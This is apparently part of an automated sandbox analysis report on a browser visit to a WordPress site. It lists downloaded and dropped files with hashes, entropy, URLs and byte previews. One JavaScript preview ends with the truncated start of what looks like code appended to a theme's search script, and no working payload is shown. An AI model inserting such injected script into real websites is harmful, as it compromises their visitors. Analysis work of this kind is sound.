                                                            MD5:EDFBF0AD8DF7C2950F06689F928F0F26
                                                            SHA1:65D19ED5FCE88626D1DB8789FF1F890B4299A9EF
                                                            SHA-256:99979AA7D1675B420E15FFC2FC216B58B61BD9EA03323D1B366C66F59080799D
                                                            SHA-512:2185633468535129879E7005EDD5AD0867EAFA6EC4458F72B7B30139052EADB3B1D59E90BD3B6381F6D5733D2096553A5E14F44439A9ABFFBE894F998C58E45C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:jQuery(document).ready(function ($){ ....if($('#search-outer.nectar').length > 0){..... var acs_action = 'myprefix_autocompletesearch'; .. $("body").on('focus','#s',function(){.. ... .if(!$(this).hasClass('ui-autocomplete-input')) {... .$(this).autocomplete({ .... .delay: 50,.... .position: {of: "#search-outer #search .container" },.... .appendTo: $("#search-box"), .... source: function(req, response){ .... $.getJSON(MyAcSearch.url+'?callback=?&action='+acs_action, req, response); .... }, .... select: function(event, ui) { .... window.location.href=ui.item.link; .... }, .... minLength: 2, .... }).data( "ui-autocomplete" )._renderItem = function( ul, item ) {......return $( "<li>" ).......append( "<a>" + item.image + "<span class='title'>" + item.label + "</span><br/><span class='desc'>" + item.post_type + "</span> </a>" ).......appendTo( ul );.....}; ....}... });... ..}. .}); ;if(ndsj===
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format (Version 2), TrueType, length 17824, version 1.0
                                                            Category:downloaded
                                                            Size (bytes):17824
                                                            Entropy (8bit):7.987401170633718
                                                            Encrypted:false
                                                            SSDEEP:384:7rlWQYHigWCrJymkqvvfnuySwFXGJt9eDU1GyURyv4aNM:M6glAIn2HC2JneuF4aK
                                                            MD5:97BF2D3BA591F7E536A9B7B58A203D17
                                                            SHA1:E672751F6A32AF9239613388BC82169895752042
                                                            SHA-256:2856DC2D6B95B5D0730624995D877DB1DD81FAC52BA37420F116F9BC09D43E00
                                                            SHA-512:FFB31197ADAF829E80111E7DD54B2F23C69AE29C81517F155DCA71AB726066E3089B4A39167C972EF363B12E7DB2BBC2E5CA37269A22788130908F822FFB6790
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUuYpg.woff2
                                                            Preview:wOF2......E...........E:.............................`....`.....B...........;..z..6.$..p. .....-..1.X.%..+......*.n.D.<B~.q.#.......B..'$'C.Xl...7XDV6..3j-T...(..iG.D.Q.<.2......`.....S.5?..|...\...{...z.../{.o.j..)...5-..'..zy.....W4.l...;h.lQ8#Gh.\....kwf...7..."$Z.....i...D........s.}E...DT.B.....Y...e..,..+..=..M.s...V..+...,.%~...B..c'..}.....yow1g.IU.q.C...Bnk.B...*..............y..!'.q..R.....C.....m.k....uJ(..#...x.z...T.D..W...u....[_,\.?.y....b<..wo..I....t.. ..!p...h.O.|{o.x.d I.6H.(.rrw.uX..T.s..m.X. {....v..=..5..3..~....f-W....?+J.4'\......g....4.).t.....No.X..v.z..Z....2.m.c?...cg./`.e....v..@.^...{S!.k;..qEM...-0.$S...+.....Z.8:.-@%..|:.....5.-`...^..c....*.........g..(. <.,.9".k.0.8i$..c...&...8..!..3.b.........s../..tz.T{......)t.n..8.@.A..6 'D.?..v'?a...'\Q..u}...n6./Ds..\..(.F..V..^....K.V..u..@.3@|.)g.6.2......z...g...!....x.eIZ.DN.H~..5w..V.#...!.....'Df.).....aL.C1....t.PQQ@..Hl..>...8....c..O=C.....;.... .5F..%.2..C.*.j.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=1152, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:17:24, width=2048], baseline, precision 8, 984x500, components 3
                                                            Category:dropped
                                                            Size (bytes):165137
                                                            Entropy (8bit):7.959963972284044
                                                            Encrypted:false
                                                            SSDEEP:3072:MdO4McOLH2EXOrGMh13L9jarCjBb375G3Hf5hBu:Xsq2EXOqMh1Bja+jV5G3HfrA
                                                            MD5:EE4F0A061B39F98ABB695D09C9972EED
                                                            SHA1:DB08BD55A992232AFA555DDFA5BBB2945A73376E
                                                            SHA-256:EDB9EB83E8CA70FE7D8BDD43002261865136657752F4D14A13E277090871DF74
                                                            SHA-512:FEA075AEC1EF7557603948DAB85938D02FB73717C65EE15620865D2DDF4F357FF0386B3AE35CBB9A74F31FB266CD087FFC37F9C2B4A375AA7E48C00A7917A3B7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF............".Exif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C.................Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:17:24...........*...........2..."...........'.......(...........0220........:...........N...........b...........j...........r...........z.......................................................................0100.................................................................................... ...!...............(...........2016:05:11 15:26:00.2016:05:11 15:26:00.5...d.......d.......d...............d.......d........................d1df98a026cf9af60000000000000000.......................................(...................&.........................................JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):26938
                                                            Entropy (8bit):7.98730517798616
                                                            Encrypted:false
                                                            SSDEEP:384:ItOtjGU54krQDWsodtpAdNhEN5Ln65nm0moGCOIQLzuHwci/9w57QnWllPYJaWlE:8eaUaklLtpAdmL600PkWwcbq+PYJaWlE
                                                            MD5:6EA52D453B8C2C6F73DEC17053207161
                                                            SHA1:D65E05AB2E898555B2389582C3D07A099AC22EA3
                                                            SHA-256:C73854BE9836582D74DEB9F09C6059986131FEF24846068CEF3DEC95CEB7378B
                                                            SHA-512:3E38571DF93D0E0FD9D8F9E6970F46576C966519836C78D066BF293501D54F1053CE28A9FEA288C7DDDF5B147AAE75F1D2B3F3F93CBF282DCDFEECD6E7DB1150
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`.E....[........7A..... ................".......@BMH.....{..@..$pG.p...eow.........Z,.8".6.18..aXzz.%<<.F..k..1.F.b.@....2!!.H.....M7L.Rui.v....s*.....@..2.....Wl..m(.N.....?..}.K....]!.....W...a..y.Q.W...-.7.v...1._...^.b.;........k...e......?.......8...P......e..8R...}G.v.0`r....3...[.Qa...B.}...s..p.)!.w.!y.8....&%).2.w&...X!....V.'...}_..y...;.~.fkL.3...".........~)1o...Yl......*x....]o......a....1"...36m.%....z.X.7O)......G.....J.....4.i.g.......7.(..r.%.|.i..P...Sq.....}..s/...P..A...-.}.U..:Dm.e.....~*.Z.....\.m..^.!nQ.oOn.a|>.}S.k.a..G\\..[D..f..8pLS.m.ad.....1cF.@ h.Q'O.D||.]"X.3.Uuu.=F....x<.UM-<......m.k..c5.02..P(.W(.9.9@...B?Zv..02.L...iT]......kF...o.e.`c.T.oK..:b..Cz}..rK.u.w..'J;t....Y.'.i.......A.,..dTff.%44.Flb!...]......!c.K......IFQ8.......;..*. '..../....~F....../~6.F.....h.u....@......*.......g.;....".9..31..<..B.....~......Q..m8.......sm:...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):21827
                                                            Entropy (8bit):7.97945326575417
                                                            Encrypted:false
                                                            SSDEEP:384:INmITsjhQ0S8h3XxVTyRvo6ENJEFneFJafrgX/JrLVTxz+4W:TITsDS8NhByRv4an0aDm/Jnj64W
                                                            MD5:7D267DD8E8071B058FA0819B43EDAE4F
                                                            SHA1:72CBB81426E33C82362BA66B3086456772C26E6C
                                                            SHA-256:28890C937FD6C5641912E1FA0F045215E2A7D8FED7A7C21EA5498121614CA5BB
                                                            SHA-512:D905305F9F3E55A2E4C1C4D05B569927349CF55D48567E89A5F86B3D338DE64BA93111F2C472EB7DACA9CEA8931712B3D353D21619DC341AAE0BAC92BB44D5CB
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/stokrotka_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`S....;i.6m...eo.Y.(.`+8p..?.....?..p.D..-...*....gK.n.4;.{_.t.i.4I...M.....=w.+t...E....!.`.}.v...w..[s?....#Xk.....O.k..C....T.f..r;..O..\*...3.}I.,.....J.1.>....>.K......xd.6,]7.m.kH..&..........6..}..^....n........_......Z-...KL.......m...'AT..]....B.a..`.N..}..w.b...p[..).z..T.Z$...RV|.d.LE......0...8.p..[[$T..+(3b.{.=v..3...X.....[.3...5..?... T..k.`..9R...-..X.#..;.-....B*.._..Y.5.)..B&V7.6......v..#<....{.A|..s...:.*.Z..i.9m....f...R.i.&...,Xu%n.|>.._..,..{....KDp.\.7n.t_..,....../..y......B.<x..........|...d..p8.7..x.i.......iz..u.9..Y0"L7.P..P(2.s.jh.k.ym..`D(....B..#%/K..kF..-....u.`...|......p&.....Z.T.8p..O.>Q..mV.I... .iSSSi..d..Piii...:.F&.".O.|.J..s......|Y..o~.OBQ.K......%..!.k....F.3?.$.jg...PU4k.H...m...fX.N<?e..Z@..S_.~.../.\...K......@.!"8B.>-..L.l.X..6N...I.n.6...S.pe/,.....7.K...=.........!.N......-5......w...U.. .`/:D.fXU.ve....p..Q..t9.........'
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 100x100, components 3
                                                            Category:dropped
                                                            Size (bytes):1197
                                                            Entropy (8bit):5.7606924269713895
                                                            Encrypted:false
                                                            SSDEEP:24:/K1he91Wwjx82lY2T3ouVKDyLyJ3VLwqgn8GoJdVQ4H:QqQNn2xAJ35i89h
                                                            MD5:7A375043A6DA02C8ACDA6BAFCE1EE61D
                                                            SHA1:E297D3C25BB6EFB0F31C584B1B97AFC3AE7A28E5
                                                            SHA-256:36CE2A4878BB4BD4BF4F742C37CE5096F4F3EEB970C7325B72A210FC9C18756B
                                                            SHA-512:18F823EF8D2331590A134BFD68E5BE43BA1D3D7D2084B3C0E04DB72FAED4B7BD7FA7838C5B3AD47BD036949F503EFEBC96BFA80061A5C5355A222B79C3743F6F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......Exif..II*.................Ducky.......".....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:519B413E9BE611E2B756DA6A01EA2BB8" xmpMM:DocumentID="xmp.did:519B413F9BE611E2B756DA6A01EA2BB8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:519B413C9BE611E2B756DA6A01EA2BB8" stRef:documentID="xmp.did:519B413D9BE611E2B756DA6A01EA2BB8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................... !#! .++..++>===>@@@@@@@@@@......................".....",......,&)###)&//,,//;;9;;
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:OpenPGP Public Key
                                                            Category:downloaded
                                                            Size (bytes):1048576
                                                            Entropy (8bit):7.999798511836997
                                                            Encrypted:true
                                                            SSDEEP:24576:wRczMUyUA3iJdNM/qFZmMDSCPTRQ5I3bUryRSr:w6zMjiJdNCUmMfPT6KiyEr
                                                            MD5:D979F79A797C66B0BFFB4F410701C289
                                                            SHA1:E01F9AF35AC9DE47C13BCFD16D1BCA024466490C
                                                            SHA-256:FEE76DF20808D69B3038E701B7CAFA7569C17B0960A70101E13FC27B928F916B
                                                            SHA-512:3611988EFD95A44B50F4D10B906D10BCFB3BED368F94860B5A11830CC293747A82567BC58E2A873330BC013E932FACA5AFCB023338F664D430050308F53A3881
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:1
                                                            Preview:.F$3%!.R.)....+cY'...k.........a......1.h.k.?=_.KXP.r..M..+6m....91...g0...'^...S.b.Pb..y..'8..\.W...J..dYr9.X.|..q..w.wY...i#,2..9..s.A{.,.c.].ZD..R..pF.....ZN..jjx..k.3F;.. ....f...>i..xkq.....hv.?(....l.x.,..4...n.ND.{8;.~.8.9..^.^b:...c?...4Ac.OKX.r8!.....^'..M.......6A..h.k..U........)......^....9..v2^...4..,...U.>...F.a:.<.+.e...*..DSQl.L..........t......6.%uS.....Vl.~..'..mpX..b.e.....W.g.n.U.. .J..7n%%{.?.=7..-.V>.&la.mpN.Hs.m..E.=...5......J.U....F...\.3.*?....|...3g.{AN.4...>....!)......j.b..K.2..i*.TE..H?T-n..f.F...._.E.._.........#peb*@.^...'Y..3..e..~....O.A9?.!,fB.d..bi..@.E.)@.=.*...h..x.~..}..O...1[.i............lRm(.G.:,.*.X....4...Z_.K!pSe..4...?.,D)DI...K...B..]./N.+..Rl.S....P4i........; ...:.D..a.....J.6|j.e+.r.4#...^U.=..).k.,..p.P...=.&..@.hE........=.n...=.d...HM!....?.g.ZC...?1.zZ...G......0.Ua...N.cQmQ1.....F.4[A.Yu..-.....|+.\....Q.;"Gw.Y_.!.....*O3...f.]...L.=.-.^..9...J..1...5;..!E..R..J.O..@<i0S`y~.........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 269, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):6971
                                                            Entropy (8bit):7.879627851828711
                                                            Encrypted:false
                                                            SSDEEP:192:uEYYYIidFR78MnQ9C497qds9PEE+UhfEwIjbXyXwqeCFjDX:RYYYpdnQ79n97J+37jjyXzTlj
                                                            MD5:2D4F8F477ECE4F0AB909D609799662E4
                                                            SHA1:BFA3515E134142F29EE7D9040AE212A1C5D5F466
                                                            SHA-256:A2F715FE55E788CCE7DBC1DFBC6102385B676381126F0CDBA0111CA978CA0750
                                                            SHA-512:BA89C099495804B14509DDF654A4B6242A9F09C372C4F995F3983304DDEBFCB4E7CDDA3CDDDBDD5AA96B968AA8FEF1342F9F8D49F86B27D5493DCC3D3F49B4A9
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...P...........[.....gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11256), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):11256
                                                            Entropy (8bit):5.010537766861896
                                                            Encrypted:false
                                                            SSDEEP:192:xthsVmeDXDanvgZenjAJKdXSMpNO96hDIzL79V1QVSD1CNxn6fR31r:czDanvuenjAkNBhDInSwh31r
                                                            MD5:2B0DD7EECEA03B4BDEDB94BA622FDB03
                                                            SHA1:703BECBA85161118DD6FC66AF465428EF43F561C
                                                            SHA-256:B7908A015A567EC2363011DF2475368DBFF34360E9DA3FDFF50604D6395FB646
                                                            SHA-512:FE64CFF950921BDF83EC09FE79CA5CE52DE40F5B8788697EB1D7B28055F2817778347D5D3C81A324801C7EC7151B3EE0EEE99B2882C3C3B10BD760342D3BF3E7
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16
                                                            Preview:.mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-container{background:#000;font-family:Helvetica,Arial,serif;position:relative;text-align:left;text-indent:0;vertical-align:top}.mejs-container,.mejs-container *{box-sizing:border-box}.mejs-container video::-webkit-media-controls,.mejs-container video::-webkit-media-controls-panel,.mejs-container video::-webkit-media-controls-panel-container,.mejs-container video::-webkit-media-controls-start-playback-button{-webkit-appearance:none;display:none!important}.mejs-fill-container,.mejs-fill-container .mejs-container{height:100%;width:100%}.mejs-fill-container{background:transparent;margin:0 auto;overflow:hidden;position:relative}.mejs-container:focus{outline:none}.mejs-iframe-overlay{height:100%;position:absolute;width:100%}.mejs-embed,.mejs-embed body{background:#000;height:100%;margin:0;over
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 1 x 1, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):921
                                                            Entropy (8bit):5.80302510812885
                                                            Encrypted:false
                                                            SSDEEP:24:ry1he91Wwjx82lY2T3ouVZnz3yJ3VMEfmqM78Gd:rwqQNn2xHziJ3VzMQc
                                                            MD5:69347101E112A650903E7BF14F8A8430
                                                            SHA1:BBC00C01EC15BF5338A2D092AF8E218FE1F2D243
                                                            SHA-256:563991EACC81C022A5E21A6F16C5E9ADD8382399D7286492A08EA319609ABC08
                                                            SHA-512:9CFA085BB1A4D01DC812C450BE2C3DDD48B7761F990034D96FB76758EA2E6288D72999E2176BDCF57DFFA3D98D722F60E51C76498FC451BF527D1BC8BBBB2D81
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/img/transparent.png
                                                            Preview:.PNG........IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:3D8956D2B79511E3AB989EBDB752CBD4" xmpMM:DocumentID="xmp.did:3D8956D3B79511E3AB989EBDB752CBD4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3D8956D0B79511E3AB989EBDB752CBD4" stRef:documentID="xmp.did:3D8956D1B79511E3AB989EBDB752CBD4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<.m....IDATx.c...?......x......IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):12980
                                                            Entropy (8bit):5.13934763324096
                                                            Encrypted:false
                                                            SSDEEP:192:H1KSxyQ8eGEmIDXJ8D9YGp8z8q8S8cyA5SNVaoR:H7GLIzJi9np8z8q8S8cy+SP
                                                            MD5:8BC70241F47EF3B44137F6AEA10EC7ED
                                                            SHA1:F4ED8C130F8B2DDA2B5D01A0A965B28C35A8DD69
                                                            SHA-256:4A2CAB82E6644870CC013A40DE5B8FECA556AAE324D7C913D36BC8267FD58803
                                                            SHA-512:80C557D671E082E411B7D241D8B8894C4C320E312A61584624AFB05FEAD4938A261FBB67A40B04098247445B2C3A10B04E8E9CDD48F4C6C11B4EF6C1DA74E2F9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/box-roll.css?ver=5.8
                                                            Preview:body.box-rolling,.body[data-footer-reveal="1"].ascend.box-rolling,.body[data-footer-reveal="1"].box-rolling {..background-color: #e4e4e4!important;.}...container-wrap, .container-wrap .main-content, #ajax-content-wrap {..min-height: 100%;.}..html {..margin-top: 0!important;.}...blurred-wrap.no-scroll, html.no-scroll, body.no-scroll {..height: 100%!important;..margin-top: 0!important;..overflow: hidden!important;.}.. .container-wrap.no-scroll {. .margin-top: 0!important;..overflow: hidden!important;. }.. .container-wrap .main-content > .row > div > div[class*="col"] {. .transition: opacity 0.35s ease;. .-webkit-transition: opacity 0.35s ease;. .-moz-transition: opacity 0.35s ease;. .opacity: 0;. }. /*.container-wrap.no-scroll .main-content > .row > div > div[class*="col"] { opacity: 0; }. .container-wrap.auto-height .main-content > .row > div > div[class*="col"] { opacity: 1; } */...#ajax-content-wrap.no-scroll {..height: 100%!important;..overflow: hidden!important;.}...nectar-box-roll
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):16101
                                                            Entropy (8bit):7.9701245081782774
                                                            Encrypted:false
                                                            SSDEEP:384:I9aQqeX5GwvLYtMC//6yzQw5hvPPpE2fehEmPLoMDJABTAQr:UZBWOytZE6ehEoos+NX
                                                            MD5:849067D42A5222B9BFA0045BDE05F57B
                                                            SHA1:A2B0A92E257992513D8529B4186BD7B37562DCA5
                                                            SHA-256:4C41859F6CA21A34BCD068A85D9A65A9E07DE7E5C58C794B156E61D8BF1633F3
                                                            SHA-512:30A8C07F6211C2DCF1BA9F4DB30D3E3298227DCF6B53C5F3E83DFB2D4C8E3CA60E81E680988D1D0595FAA251B2BD9ADC8F18AF2BA649B4F733514275E3D6E13E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD.......C......pHYs...#...#.x.?v....tIME......56.uT.. .IDATx..w|........dIV.,.U......bJh.t.$_HB.M...R ..nB...R.....z1`:.wu...9:}w..CG.6.6..<..0::.fw.}..YP(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...@."8.H).X,..]]]...Q.D".4M.*.c....q:..@ .6;;.%..s...T%...i..#...........1.@.@ .....r.t:U!}.H&.$.........a233....?...n.B.T))a}.E...ug}}...@....INN.*.O...........-))y8;;..J\JX..f_$...m.~.......T...........]......|.Q.E%.O...[.n}...%%%x<.U(.!b.......1....4!D\....(*a....W.+,,....W...............5M. ...T....Y.X.....w.Q^.U)...u..EG...m.....R......*..~u.M..5j.C..;.L&Y.n].....y...*i)a}..@..,[.l.q..JV..Ik.....&....j.<T.....\.dI..#.>.O..b.D".._..8qb..".J...T......6lx...H.J._|>.EEE...6.!.t..Q.:..2:::~lY..."U .......&ttt\/.4T.(a.-ael......0..Eyy9[.l.NJ..JC..h..QWW........T.J.0;;;P[[{...JD..#......KKKUa(....RZZZ..m;[....G.]544....r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):20606
                                                            Entropy (8bit):7.981777247829724
                                                            Encrypted:false
                                                            SSDEEP:384:IfQCwoevnq1n4NByEIgvBs6vpGdeb8XCI7TVAAnkAMToeklU0G5lc1WDGh:aQqMqpsc2vFGSm77kAIoekleDc1kGh
                                                            MD5:064847E1A65229F501BECBE073480A11
                                                            SHA1:5A08668F8D9347BED5925DAC4261AD0D74C147B0
                                                            SHA-256:1462CE691C5E305C49FE5E1AB04F7CBA85FCCD829B3AB42BBD407B6863A16AC6
                                                            SHA-512:8755B13A9AA8CFB14FAA79B4AB2088AD566A2FDA2EEE0D76E060340A53110F10B8FC6976789A8C858A77450CBFF0D128815E410858650BF9119495FC01262D14
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......"..d... .IDATx..w.\Wy..>..z.d5[.,.\....&.....oB.!t...jh6...5$`..w..6.IX.......6m.......q...$@..._..^..rf..>.s..9`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.......S...T*o....jbbb....Q.......q.I.u'.......d..O.!"32F...D...x...'....]Y,.).....<..u]3H...A....J%&&&......ag[[.-.b..B......k.......G_U,.s...477....bhh...QJ.Ry.9_ijjz...#X.wn.......<..b.....e..?..........~ .....F.~..*s...{.8>o.9d.Y3(.DT*...;.m..,\..2!D......B%.RK.....:;;.......s...z{{.W.Zu..r..B.Q1...E..J..].v}~...9cU.j..].../.]6...."6.b.....r...{.~a...U.f....v..O;...r_3.e...u..8^.m..g.qF...W...;*k.=...{h.....-[..;..........drr..w..[.n..b..o.4C.[.Uf.=.tuu..2....y.......s..:cF....+{pp..q.....2.b....."...........:U.U....w.?....7b.......Z.z3.F.N.X9G...tSSS.....5ljj*.>|.3Zk.....)J.....?.;w....o..s..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1391)
                                                            Category:downloaded
                                                            Size (bytes):1426
                                                            Entropy (8bit):5.158381671009404
                                                            Encrypted:false
                                                            SSDEEP:24:Q77OUdqIoZ2zsben5WlLysyIOKI1mQqRhoj3v2rFEgRuLUMB9/RUCXXmC3+:Q7SUyEsyKystOKumTsOrFEmu7Bl6CX2P
                                                            MD5:905225D5711B559D3092387D5FFBEDBD
                                                            SHA1:6F6C39075263BAFB9E8C10F1B34A1A0F7EE03C9D
                                                            SHA-256:5BE614BCE53F767993A5F5F14A6BADD6AAE6BF3AF7CBDBF4D31520DE49E27991
                                                            SHA-512:5AD34CF11ACF45AE256B2641496BE13939CD5E0212810C43AB20CADBB313A1D99CB3A451148E160D80F1F952A8514480C2953BC6CA0C4697A466A01E1C3D5F8D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/wp-embed.min.js?ver=5.8
                                                            Preview:/*! This file is auto-generated */.!function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){for(var r,a,i,s=d.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),n=d.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),o=0;o<n.length;o++)n[o].style.display="none";for(o=0;o<s.length;o++)if(r=s[o],e.source===r.contentWindow){if(r.removeAttribute("style"),"height"===t.message){if(1e3<(i=parseInt(t.value,10)))i=1e3;else if(~~i<200)i=200;r.height=i}if("link"===t.message)if(a=d.createElement("a"),i=d.createElement("a"),a.href=r.getAttribute("src"),i.href=t.value,i.host===a.host)if(d.activeElement===r)c.top.location.href=t.value}}},e)c.addEventListener("message",c.wp.receiveEmbedMessage,!1),d.addEventListener("DOMContentLoaded",t,!1),c.addEventListener("load",t,!1);function t(){if(!n){n=!
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):31888
                                                            Entropy (8bit):7.985000268153039
                                                            Encrypted:false
                                                            SSDEEP:768:cUaz1Pjt75GpWxuxC2pKCI+SXE++rYjqY:h41PV5mWCkztXA+f
                                                            MD5:E2CB3D5023FF58EA37415AFDE65FB853
                                                            SHA1:CC622F18941C14C08F79DE82B362F62FDFFD55DF
                                                            SHA-256:208FFCA78C1017F0C96A17925F0571BBA2CE5B0E30834298EB62EC708CE435A8
                                                            SHA-512:D9775B3A0A1FB60C07373A9387796762AED477D0E21296BDAF7623B4E07130C39DB78856BB704ADC06B848EE5FA81D2B5FE3E1525AA405D3C004DC5BC7A6249E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_sofia_the_first.png
